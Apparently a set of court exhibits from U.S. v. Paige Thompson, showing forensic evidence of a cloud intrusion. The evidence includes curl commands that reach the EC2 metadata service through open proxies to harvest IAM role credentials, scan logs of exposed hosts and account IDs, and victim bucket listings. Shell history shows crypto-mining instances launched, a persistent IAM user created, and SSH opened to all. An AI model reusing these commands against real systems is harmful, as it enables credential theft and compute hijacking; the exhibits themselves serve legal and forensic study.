pass
events.pcap
csp.redirect.server.ec2.tags
csp.redirect.server.ec2.user-data
14-03-19.non443.log
ajaykanthei
14-03.19
cicd-instance.us-west-2.ec2.instances
cicd-instance.us-west-1.ec2.instances
cicd-instance.us-east-2.ec2.instances
cicd-instance.us-east-1.ec2.instances
54.164.114.241.binary.user-data
11-3-19.non443.log
11-3-19.443.log
11-3-19
9-3-19.non443.log
9-03-19.443.log
9-3-19
nano
astem.newuser
astem.role.sshkey
astem-role
convox-us-east-1.ec2
tmp3
tmp2
tmp
ec2_run_instance.sh
7-03-19.443.log
7-03-19.non443.log
7-03-19
fuseos-dev-compute.ec2_instances.us-east-1
new-ec2-credentials-describe-instances
another_ec2_instance_role
ami-id.tar
https_ports.txt
ports.txt
all_shuf.xz
spool.sh
ip-ranges.json
deploy.sh
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 100.25.48.94:80 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 54.200.124.191:3129 http://169.254.169.254/latest/meta-data/iam/info
{
"Code" : "Success",
"LastUpdated" : "2019-03-08T03:30:38Z",
"InstanceProfileArn" : "arn:aws:iam: instance-profile
"InstanceProfileId" :
}curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 35.164.189.79:80 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 54.65.254.5:3128 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 18.203.85.234:8888 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 54.166.77.120:3128 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 13.126.154.214:80 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 52.87.83.135:80 http://169.254.169.254/latest/meta-data/iam/info
<html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">{
"Code" : "Success",
"LastUpdated" : "2019-03-08T02:59:52Z",
\1b52-md126-luksopen, Volume\home\erratic\aws_hacking_shit\aws_scan\7-03-19.non443.log

# EXHIBIT 806

```
5516  aws ec2 describe-instances --region eu-west-1 | jq '.Reservations | .[] | .Instances | .[] | .InstanceType'
5517  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5518  aws ec2 run-instances --region eu-west-1 --instance-type p2.16xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5519  aws ec2 run-instances --region eu-west-1 --instance-type p3.2xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5520  aws ec2 run-instances --region eu-west-1 --instance-type p2.16xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5521  aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 3 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5522  aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5523  aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5524  aws ec2 run-instances --region eu-west-1 --instance-type p2.2xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5525  aws ec2 run-instances --region eu-west-1 --instance-type p2.xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5526  aws ec2 run-instances --region eu-west-1 --instance-type p3.xlarge --count 1 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5536  aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5537  aws ec2 run-instances --region eu-west-1 --instance-type g3.16xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5538  aws ec2 run-instances --region eu-west-1 --instance-type g3.8xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5539  aws ec2 run-instances --region eu-west-1 --instance-type g3.2xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5540  aws ec2 run-instances --region eu-west-1 --instance-type g3.4xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5541  aws ec2 run-instances --region eu-west-1 --instance-type g3s.xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --key-name default
5542  aws ec2 describe-instances --region eu-west-1 | jq '.Reservations | .[] | .Instances | .[] | [.InstanceType, .PublicIpAddress]'
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 806
Admitted________________

config

```
# host [redacted]-g3.4xlarge-1
#   HostName                    34.254.249.212
#   User                        ubuntu
#   IdentityFile                ~/.ssh/[redacted]-eu-west-1.id_rsa
#   IdentitiesOnly              yes

# host [redacted]-g3.4xlarge-2
#   HostName                    34.251.109.44
#   User                        ubuntu
#   IdentityFile                ~/.ssh/[redacted]-eu-west-1.id_rsa
#   IdentitiesOnly              yes

# host [redacted]-g3s.xlarge-1
#   HostName                    52.211.167.148
#   User                        ubuntu
#   IdentityFile                ~/.ssh/[redacted]-eu-west-1.id_rsa
#   IdentitiesOnly              yes

# host [redacted]-g3s.xlarge-2
#   HostName                    54.154.112.182
#   User                        ubuntu
#   IdentityFile                ~/.ssh/[redacted]-eu-west-1.id_rsa
#   IdentitiesOnly              yes

# host [redacted]-g3.16xlarge-1
#   HostName                    34.243.40.14
#   User                        ubuntu
#   IdentityFile                ~/.ssh/[redacted]-eu-west-1.id_rsa
#   IdentitiesOnly              yes
```

# EXHIBIT 807

awsscan.txt

```
http://52.202.95.84:8181        "InstanceProfileArn" : "arn:aws:iam::646253092271:instance-profile
http://52.199.114.150:8001      "InstanceProfileArn" : "arn:aws:iam::031937983129:instance-profile
http://52.79.227.180:3000       "InstanceProfileArn" : "arn:aws:iam::715120914553:instance-profile
http://54.200.150.203:8001      "InstanceProfileArn" : "arn:aws:iam::766845206390:instance-profile
http://13.232.127.99:8080       "InstanceProfileArn": "arn:aws:iam::288783958947:instance-profile/
http://13.232.127.99:8000       "InstanceProfileArn": "arn:aws:iam::366763853509:instance-profile/
https://63.32.127.100:443       "InstanceProfileArn" : "arn:aws:iam::235087924053:instance-profile
https://35.162.65.136:443       "InstanceProfileArn" : "arn:aws:iam::427884659784:instance-profile
http://52.59.198.77:8080        "InstanceProfileArn": "arn:aws:iam::346734181617:instance-profile/
http://52.59.198.77:8000        "InstanceProfileArn": "arn:aws:iam::387744940020:instance-profile/
http://52.72.216.229:8181       "InstanceProfileArn" : "arn:aws:iam::646253092271:instance-profile
http://13.52.44.117:80      "InstanceProfileArn" : "arn:aws:iam::254214173625:instance-profile/wai
http://52.36.188.73:8088        "InstanceProfileArn" : "arn:aws:iam::816892654645:instance-profile
http://54.183.173.34:8080       "InstanceProfileArn": "arn:aws:iam::513932806757:instance-profile/
http://54.183.173.34:8000       "InstanceProfileArn": "arn:aws:iam::503276176098:instance-profile/
http://34.210.95.136:3128       "InstanceProfileArn" : "arn:aws:iam::007048575156:instance-profile
https://13.52.44.117:443        "InstanceProfileArn" : "arn:aws:iam::254214173625:instance-profile
http://34.210.95.136:3129       "InstanceProfileArn" : "arn:aws:iam::007048575156:instance-profile
https://54.214.49.137:443       "InstanceProfileArn" : "arn:aws:iam::756537995458:instance-profile
http://52.79.116.117:3128       "InstanceProfileArn" : "arn:aws:iam::140068605264:instance-profile
http://18.231.1.242:8085        "InstanceProfileArn" : "arn:aws:iam::241211947956:instance-profile
http://18.231.1.242:8082        "InstanceProfileArn" : "arn:aws:iam::241211947956:instance-profile
http://34.233.83.33:8181        "InstanceProfileArn" : "arn:aws:iam::646253092271:instance-profile
http://34.197.158.104:8181      "InstanceProfileArn" : "arn:aws:iam::646253092271:instance-profile
http://34.218.113.19:3129       "InstanceProfileArn" : "arn:aws:iam::007048575156:instance-profile
http://34.218.113.19:3128       "InstanceProfileArn" : "arn:aws:iam::007048575156:instance-profile
http://13.232.182.109:3128      "InstanceProfileArn" : "arn:aws:iam::030119758977:instance-profile
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 807
Admitted________________

aws.commands

1b52-md126-luksopen | 1b52-md126-luksopen, Vol...

\home\erratic\.ssh

| Name | Description | Type | Size | Created | Modified | Record changed | Attr. | 1st sector |
|---|---|---|---|---|---|---|---|---|
| .. = erratic (10,395,105) | existing, already viewed | | 866 GB | 07/10/2019 08:09:21 -7 | 07/29/2019 06:17:47 -7 | 07/29/2019 06:17:47 -7 | rwxrwxrwx | 7,044,586,140 |
| . = .ssh (163) | existing | | 951 KB | 07/10/2019 10:34:31 -7 | 07/19/2019 07:13:27 -7 | 07/19/2019 07:13:27 -7 | rwxrwxrwx | 11,681,877,781 |
| code_deploy_role.id_rsa | existing | pem | 1.6 KB | 07/10/2019 10:34:31 -7 | 03/12/2019 03:43:07 -7 | 07/19/2019 06:25:13 -7 | rwxrwxrwx | 11,681,864,519 |
| comcastgw.id_rsa | existing | pem | 1.6 KB | 07/10/2019 10:34:31 -7 | 03/30/2019 10:09:31 -7 | 07/19/2019 06:25:13 -7 | rwxrwxrwx | 11,681,864,553 |
| config | existing, already viewed | ascii_unix | 27.7 KB | 07/10/2019 10:34:31 -7 | 06/25/2019 10:27:19 -7 | 07/19/2019 06:25:13 -7 | Crwxrwxrwx | 6,992,279,536 |
| default.pem | existing | pem | 1.7 KB | 07/10/2019 10:34:31 -7 | 03/08/2019 23:41:04 -8 | 07/19/2019 06:25:13 -7 | rwxrwxrwx | 11,681,864,466 |
| default_id_rsa | existing | pem | 1.7 KB | 07/10/2019 10:34:31 -7 | 03/08/2019 23:41:04 -8 | 07/19/2019 06:25:13 -7 | rwxrwxrwx | 11,681,864,474 |
| default_.pem | existing | pem | 1.7 KB | 07/10/2019 10:34:31 -7 | 03/08/2019 23:41:04 -8 | 07/19/2019 06:25:13 -7 | rwxrwxrwx | 11,681,864,470 |
| DevGatewayInstanceRole.id_rsa | existing | pem | 1.6 KB | 07/10/2019 10:34:31 -7 | 03/22/2019 00:04:38 -7 | 07/19/2019 06:25:13 -7 | rwxrwxrwx | 11,681,864,515 |
| devops-role-default3-us-west-2.id_rsa | existing | pem | 1.6 KB | 07/10/2019 10:34:31 -7 | 04/07/2019 18:54:30 -7 | 07/19/2019 06:25:13 -7 | rwxrwxrwx | 11,681,877,813 |

Partition | File | Preview | Details | Gallery | Calendar | Legend | Raw | Text

```
host weighttrainer-1
  HostName          54.148.234.88
  User            ubuntu
  IdentityFile       ~/.ssh/weighttrainer.id_rsa
  IdentitiesOnly       yes

host weighttrainer-2
  HostName          34.220.189.209
  User            ubuntu
  IdentityFile       ~/.ssh/weighttrainer.id_rsa
  IdentitiesOnly       yes

host weighttrainer-3
  HostName          34.215.151.134
  User            ubuntu
  IdentityFile       ~/.ssh/weighttrainer.id_rsa
  IdentitiesOnly       yes

host weighttrainer-4
  HostName          34.217.212.132
  User            ubuntu
  IdentityFile       ~/.ssh/weighttrainer.id_rsa
  IdentitiesOnly       yes

host weighttrainer-5
  HostName          52.38.153.12
  User            ubuntu
  IdentityFile       ~/.ssh/weighttrainer.id_rsa
  IdentitiesOnly       yes

host weighttrainer-6
  HostName          54.245.190.196
  User            ubuntu
  IdentityFile       ~/.ssh/weighttrainer.id_rsa
  IdentitiesOnly       yes
```

iam_fulllog.txt

```
http://52.72.216.229:8181   }http://13.52.44.117:80 {
http://13.52.44.117:80    "Code" : "Success",
http://13.52.44.117:80    "LastUpdated" : "2019-04-19T17:45:12Z",
http://13.52.44.117:80    "InstanceProfileArn" : "arn:aws:iam::254214173625:instance-profile/ ",
http://13.52.44.117:80    "InstanceProfileId" : "AIPAJZBH4KPUVYKS5QQDU"
http://13.52.44.117:80  }http://52.36.188.73:8088    {
http://52.36.188.73:8088      "Code" : "Success",
http://52.36.188.73:8088      "LastUpdated" : "2019-04-19T17:21:34Z",
http://52.36.188.73:8088      "InstanceProfileArn" : "arn:aws:iam::816892654645:instance-profile/ ",
http://52.36.188.73:8088      "InstanceProfileId" :  "
http://52.36.188.73:8088    }http://52.87.83.135:80 <html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">{
http://52.87.83.135:80    "Code" : "Success",
http://52.87.83.135:80    "LastUpdated" : "2019-04-18T22:26:14Z",
http://52.87.83.135:80    "InstanceProfileArn" : "arn:aws:iam::590710864528:instance-profile/ ,
http://52.87.83.135:80    "InstanceProfileId" : "AIPAJB4KQ6KV6FHVDDW36"
http://52.87.83.135:80  }</pre></body></html>https://13.52.44.117:443    {
https://13.52.44.117:443      "Code" : "Success",
https://13.52.44.117:443      "LastUpdated" : "2019-04-19T17:45:12Z",
https://13.52.44.117:443      "InstanceProfileArn" : "arn:aws:iam::254214173625:instance-profile ",
https://13.52.44.117:443      "InstanceProfileId" : "AIPAJZBH4KPUVYKS5QQDU"
https://13.52.44.117:443    }http://54.183.173.34:8000  {
http://54.183.173.34:8000     "InstanceProfileArn": "arn:aws:iam::503276176098:instance-profile/
http://54.183.173.34:8000     "InstanceProfileId": "AIPALDPUOWFEIVPNDRHFY",
http://54.183.173.34:8000     "Code": "Success",
http://54.183.173.34:8000     "LastUpdated": "2019-34-18T23:34:39Z"
http://54.183.173.34:8000   }http://54.183.173.34:8080  {
http://54.183.173.34:8080     "InstanceProfileArn": "arn:aws:iam::513932806757:instance-profile/ - 
http://54.183.173.34:8080     "InstanceProfileId": 
http://54.183.173.34:8080     "Code": "Success",
http://54.183.173.34:8080     "LastUpdated": "2019-34-18T23:34:39Z"
http://54.183.173.34:8080   }http://34.210.95.136:3128  {
http://34.210.95.136:3128     "Code" : "Success",
http://34.210.95.136:3128     "LastUpdated" : "2019-04-19T17:43:42Z",
http://34.210.95.136:3128     "InstanceProfileArn" : "arn:aws:iam::007048575156:instance-profile/ ",
http://34.210.95.136:3128     "InstanceProfileId" :  "
http://34.210.95.136:3128   }http://34.210.95.136:3129  {
http://34.210.95.136:3129     "Code" : "Success",
http://34.210.95.136:3129     "LastUpdated" : "2019-04-19T17:43:42Z",
http://34.210.95.136:3129     "InstanceProfileArn" : "arn:aws:iam::007048575156:instance-profile/
http://34.210.95.136:3129     "InstanceProfileId" : 
```

ldap_amazon.txt

```
https://13.52.44.117:443    * Rebuilt URL to: ldap.amazon.com:389/
https://13.52.44.117:443    *   Trying 13.52.44.117...
https://13.52.44.117:443    * TCP_NODELAY set
https://13.52.44.117:443    * Connected to 13.52.44.117 (13.52.44.117) port 443 (#0)
https://13.52.44.117:443    } [5 bytes data]
https://13.52.44.117:443    * TLSv1.2 (OUT), TLS handshake, Client hello (1):
https://13.52.44.117:443    } [167 bytes data]
https://13.52.44.117:443    * TLSv1.2 (IN), TLS handshake, Server hello (2):
https://13.52.44.117:443    { [93 bytes data]
https://13.52.44.117:443    * TLSv1.2 (IN), TLS handshake, Certificate (11):
https://13.52.44.117:443    { [4601 bytes data]
https://13.52.44.117:443    * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
https://13.52.44.117:443    { [300 bytes data]
https://13.52.44.117:443    * TLSv1.2 (IN), TLS handshake, Server finished (14):
https://13.52.44.117:443    { [4 bytes data]
https://13.52.44.117:443    * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
https://13.52.44.117:443    } [37 bytes data]
https://13.52.44.117:443    * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
https://13.52.44.117:443    } [1 bytes data]
https://13.52.44.117:443    * TLSv1.2 (OUT), TLS handshake, Finished (20):
https://13.52.44.117:443    } [16 bytes data]
https://13.52.44.117:443    * TLSv1.2 (IN), TLS handshake, Finished (20):
https://13.52.44.117:443    { [16 bytes data]
https://13.52.44.117:443    * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
https://13.52.44.117:443    * Proxy certificate:
https://13.52.44.117:443    *  subject: OU=Domain Control Validated; OU=EssentialSSL Wildcard; CN=*
https://13.52.44.117:443    *  start date: Sep 12 00:00:00 2018 GMT
https://13.52.44.117:443    *  expire date: Sep 12 23:59:59 2019 GMT
https://13.52.44.117:443    *  issuer: C=GB; ST=Greater Manchester; L=Salford; O=COMODO CA Limited; CN=COMODO RSA Domain Validation Secure Server CA
https://13.52.44.117:443    *  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
https://13.52.44.117:443    * allocate connect buffer!
https://13.52.44.117:443    * Establish HTTP proxy tunnel to ldap.amazon.com:389
https://13.52.44.117:443    } [5 bytes data]
https://13.52.44.117:443    > CONNECT ldap.amazon.com:389 HTTP/1.1
https://13.52.44.117:443    > Host: ldap.amazon.com:389
https://13.52.44.117:443    > User-Agent: curl/7.60.0
https://13.52.44.117:443    > Proxy-Connection: Keep-Alive
https://13.52.44.117:443    >
https://13.52.44.117:443    { [5 bytes data]
https://13.52.44.117:443    < HTTP/1.1 500 Internal Server Error
https://13.52.44.117:443    < Date: Fri, 19 Apr 2019 23:09:17 GMT
https://13.52.44.117:443    < Server: Apache/2.4.29 (Ubuntu)
https://13.52.44.117:443    < Content-Length: 613
https://13.52.44.117:443    < Connection: close
https://13.52.44.117:443    < Content-Type: text/html; charset=iso-8859-1
https://13.52.44.117:443    <
https://13.52.44.117:443    * The requested URL returned error: 500
https://13.52.44.117:443    * CONNECT phase completed!
https://13.52.44.117:443    * Connection #0 to host 13.52.44.117 left intact
```

listbuckets.log

```
https://3.120.71.226:443                "CreationDate": "2019-01-28T16:21:24.000Z"
https://3.120.71.226:443            },
https://3.120.71.226:443            {
https://3.120.71.226:443                "Name": "wepa-logsbucket-73tlwarquea2",
https://3.120.71.226:443                "CreationDate": "2019-01-28T16:22:14.000Z"
https://3.120.71.226:443            },
https://3.120.71.226:443            {
https://3.120.71.226:443                "Name": "wepa-logsbucket-17x9hjt7zegc",
https://3.120.71.226:443                "CreationDate": "2019-01-28T16:22:15.000Z"
https://3.120.71.226:443            },
https://3.120.71.226:443            {
https://3.120.71.226:443                "Name": "wyndham-logsbucket-1360690cvs21u",
https://3.120.71.226:443                "CreationDate": "2019-01-28T16:22:40.000Z"
https://3.120.71.226:443            }
https://3.120.71.226:443        ],
https://3.120.71.226:443        "Owner": {
https://3.120.71.226:443            "ID": "844638f154638343daf5373b2ead5a79e3f8a78eb45e7ce8ae1d950e280666c3"
https://3.120.71.226:443        }
https://3.120.71.226:443    }
http://54.200.150.203:8001  ecsInstanceRole
http://54.200.150.203:8001
http://54.200.150.203:8001  An error occurred (AuthorizationHeaderMalformed) when calling the ListBuckets operation: The authorization header is malformed; a non-empty Access Key (AKID) must be provided in the credential.
http://13.52.44.117:80
http://13.52.44.117:80
http://13.52.44.117:80  An error occurred (AuthorizationHeaderMalformed) when calling the ListBuckets operation: The authorization header is malformed; a non-empty Access Key (AKID) must be provided in the credential.
http://13.232.182.109:3128  Ec2-S3-in-window
```

# EXHIBIT 808

mega_metadata.txt

```
629 ../metadata_old/18.208.62.195.metadata.443:ami-id
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 808
Admitted__________________

11-3-19.443.log

```
{
  "Code" : "Success",
  "LastUpdated" : "2019-03-12T04:35:09Z",
  "InstanceProfileArn" : "arn:aws:iam::[redacted]7507:instance-profile/[redacted]
  "InstanceProfileId" : "[redacted]
```

aws.commands

```
973  aws ec2 create-key-pair --region eu-west-2
977  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-9c32cef5 --instance-initiated-shutdown-behavior terminate --key-name default --user-data file://minersetup_eth.sh
978  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-9c32cef5 --instance-initiated-shutdown-behavior terminate --key-name default --user-data file://minersetup_eth.sh
981  aws ec2 authorize-security-group-ingress --group-id sg-9c32cef5 --protocol tcp --port 22 --cidr 0.0.0.0/0 --region eu-west-1
982  aws ec2 authorize-security-group-ingress --group-id sg-9c32cef5 --protocol tcp --port 22 --cidr 0.0.0.0/0 --region eu-west-2
```

aws.commands

858

aws.commands

```
7636  aws iam create-user --user-name default
7637  aws iam create-access-key --user-name default\n
7638  aws iam put-user-policy --user-name default --policy-name DefaultPolicy --policy-document file:///mnt/export2/DefaultPolicy\n
7639  aws iam list-users
7640  aws --profile ec2service iam list-users
7641  nano ~/.aws/credentials
7642  aws --profile protectionprod iam list-users
7643  aws --profile protectionprod iam list-buckets
7644  aws --profile protectionprod s3api list-buckets
7645  aws organizations
7646  aws organizations describe-account
7647  aws organizations describe-organization
7648  aws admin describe-organization
7649  aws --profile admin organizations describe-organization
7650  aws --profile protectionprod organizations describe-organization
7651  aws --profile astem organizations describe-organization
7652  aws --profile default ec2service s3api list-buckets
7653  aws ec2service s3api list-buckets
7654  aws --profile default s3api list-buckets
```

notes2

```
hit this before
https://18.208.62.195:443        {
https://18.208.62.195:443          "Code" : "Success",
https://18.208.62.195:443          "LastUpdated" : "2019-04-18T02:57:11Z",
https://18.208.62.195:443          "InstanceProfileArn" : "arn:aws:iam::[redacted]7507:instance-[redacted]
https://18.208.62.195:443          "InstanceProfileId" : "[redacted]
```

notes2
Another unfixed previously used account
An error occurred (InvalidKeyPair.Duplicate) when calling the CreateKeyPair operation: The keypair 'default' already exists.

# EXHIBIT 809

mega_metadata.txt

```
../metadata_old/52.48.80.230.metadata.443:ami-id
../metadata_old/52.41.122.83.metadata.443:ami-id
../metadata_old/3.16.148.71.metadata.8081:ami-id
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 809
Admitted____________________

7-03-19.443.log

```
{
  "Code" : "Success",
  "LastUpdated" : "2019-03-08T04:41:53Z",
  "InstanceProfileArn" : "arn:aws:iam::[redacted]2642:instance-profile/[redacted]
  "InstanceProfileId" : "[redacted]
```

11-3-19.443.log

```
{
  "Code" : "Success",
  "LastUpdated" : "2019-03-12T04:41:19Z",
  "InstanceProfileArn" : "arn:aws:iam::[redacted]2642:instance-profile/[redacted]
  "InstanceProfileId" : [redacted]
```

aws.commands

```
26
28 aws ec2 describe-instances --region eu-north-1
29 aws ec2 terminate-instances --instance-ids i-0d750886a37bc58fe --region eu-north-1
30 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id ami-5e9c1520 --key-name default --subnet-id subnet-f5b3b08d --associate-public-ip-address --security-group-ids sg-34d53f5d
31 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id ami-5e9c1520 --key-name default  --associate-public-ip-address --security-group-ids sg-34d53f5d
32 aws ec2 describe-security-groups --region eu-west2
33 aws ec2 create-key-pair --key-name default --region eu-west-2
39 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id ami-07dc734dc14746eab --key-name default  --associate-public-ip-address --security-group-ids sg-7e56b917
40 aws ec2 authorize-security-group-ingress --group-id sg-7e56b917 --protocol tcp --port 22 --cidr 0.0.0.0/0 --region eu-west-2 --region eu-west-2
41 ls /home/erratic/aws_scan/.ssh/eu-west-2.id_rsa
47 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id ami-07dc734dc14746eab --key-name default  --associate-public-ip-address --security-group-ids sg-7e56b917
50 aws ec2 run-instances --region eu-west-2 --instance-type p3.2xlarge --count 1 --image-id ami-07dc734dc14746eab --key-name default  --associate-public-ip-address --security-group-ids sg-7e56b917
51 aws ec2 describe-instances --region eu-west-2 |less
53 aws ec2 describe-instances --region eu-west-2 | grep IPAddress
54 aws ec2 describe-instances --region eu-west-2 | grep IpAddress
78 aws ec2 terminate-instances --instance-id i-08971fdb6787e9c66
79 aws ec2 terminate-instances --instance-id i-08971fdb6787e9c66  --region us-west-2
80 aws ec2 describe-instances --region eu-west-2 | jq -r '.Reservations | .[] | .Instances | .[] | .InstanceId' | parallel aws ec2 modify-instance-attribute --instance-id {} --instance-initiated-shutdown-behavior terminate --region eu-west-2
82 aws ec2 run-instances --region us-west-2 --instance-type c5n.large --count 1 --image-id ami-005bdb005fb00e791 --key-name default  --associate-public-ip-address --security-group-ids sg-0d2c65751b2642544
102 aws ec2 create-key-pair --region us-west-2 --key-name _
105 aws ec2 terminate-instances --instance-ids i-0bd2fed6a6e7f7e41
106 aws ec2 terminate-instances --instance-ids i-0bd2fed6a6e7f7e41 --region us-west-2
107 aws ec2 run-instances --region us-west-2 --instance-type c5n.large --count 1 --image-id ami-005bdb005fb00e791 --key-name _  --associate-public-ip-address --security-group-ids sg-0d2c65751b2642544 --instance-initiated-shutdown-behavior terminate
```

aws.commands

```
927  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-16b6717f --instance-initiated-shutdown-behavior terminate
--user-data file://minersetup_eth.sh
928  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-7e56b917 --instance-initiated-shutdown-behavior terminate
--user-data file://minersetup_eth.sh --key-name default
930  aws ec2 describe-security-groups --group-ids sg-7e56b917
931  aws ec2 describe-security-groups --group-ids sg-7e56b917 --region eu-west-2
941  aws ec2 modify-instance-attribute --instance-ids i-09a54ea0fa4d3b027 --user-data ""
942  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data "" --region eu-west-2
943  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data="" --region eu-west-2
944  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data file:///dev/null --region eu-west-2
945  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data="[]" --region eu-west-2
946  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data="{}" --region eu-west-2
947  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data='{"value": ""}' --region eu-west-2
948  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data-'{"value": "none"}' --region eu-west-2
949  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data='{"Value": ""}' --region eu-west-2
950  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-7e56b917 --instance-initiated-shutdown-behavior terminate
--user-data --key-name default
951  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-7e56b917 --instance-initiated-shutdown-behavior terminate
--key-name default
```

# EXHIBIT 810

mega_metadata.txt

```
../metadata_old/34.239.113.195.metadata.443:ami-id
../metadata_old/18.191.157.180.metadata.80:ami-id
../metadata_old/52.212.49.160.metadata.82:ami-id
../metadata_old/52.220.58.82.metadata.81:ami-id
../metadata_old/52.56.232.56.metadata.443:ami-id
../metadata_old/18.234.97.18.metadata.443:ami-id
../metadata_old/18.213.111.76.metadata.443:ami-id
../metadata_old/35.182.34.198.metadata.808:ami-id
../metadata_old/52.76.48.213.metadata.443:ami-id
../metadata_old/3.121.200.114.metadata.443:ami-id
../metadata_old/54.173.210.136.metadata.443:ami-id
../metadata_old/52.64.158.166.metadata.80:ami-id
../metadata_old/13.113.12.133.metadata.80:ami-id
../metadata_old/35.153.226.225.metadata.80:ami-id
../metadata_old/18.217.40.206.metadata.8001:ami-id
../metadata_old/122.248.239.99.metadata.443:ami-id
../metadata_old/107.23.48.26.metadata.443:ami-id
../metadata_old/54.234.236.194.metadata.80:ami-id
../metadata_old/13.251.146.92.metadata.443:ami-id
../metadata_old/54.166.183.10.metadata.3128:ami-id
../metadata_old/52.78.213.1.metadata.8888:ami-id
../metadata_old/54.84.204.162.metadata.443:ami-id
../metadata_old/34.220.181.209.metadata.3128:ami-id
../metadata_old/54.232.248.219.metadata.443:ami-id
../metadata_old/35.169.98.216.metadata.8443:ami-id
../metadata_old/18.209.225.93.metadata.80:ami-id
../metadata_old/34.227.67.245.metadata.3128:ami-id
../metadata_old/54.80.21.207.metadata.3128:ami-id
